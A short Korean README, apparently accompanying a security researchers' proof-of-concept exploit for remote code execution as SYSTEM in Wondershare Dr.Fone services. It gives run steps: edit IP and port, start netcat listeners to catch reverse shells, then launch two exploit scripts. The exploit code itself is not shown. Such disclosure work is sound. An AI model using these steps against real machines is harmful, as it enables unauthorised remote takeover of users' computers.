
Netanel Cohen와 Tomer Peled, BugSec의 보안 연구원.
Wondershare Dr.Fone을 악용하는 POC 예제입니다.
Dr.Fone은 Wondershare가 개발한 휴대폰 툴킷이며, RCE에 취약합니다.
네트워크 접근만으로도 SYSTEM 사용자 권한으로 원격 코드를 실행할 수 있습니다.
취약한 서비스:
InstallAssistService.exe
ElevationService.exe
테스트된 버전: 12.0.7, 11.4
IP와 포트를 변경하고 실행하세요.
stty raw -echo; (stty size; cat) | nc -lvnp 1338
./ElevationServiceRCE.py
nc -lvnp 1337
./InstallAssistServiceRCE.py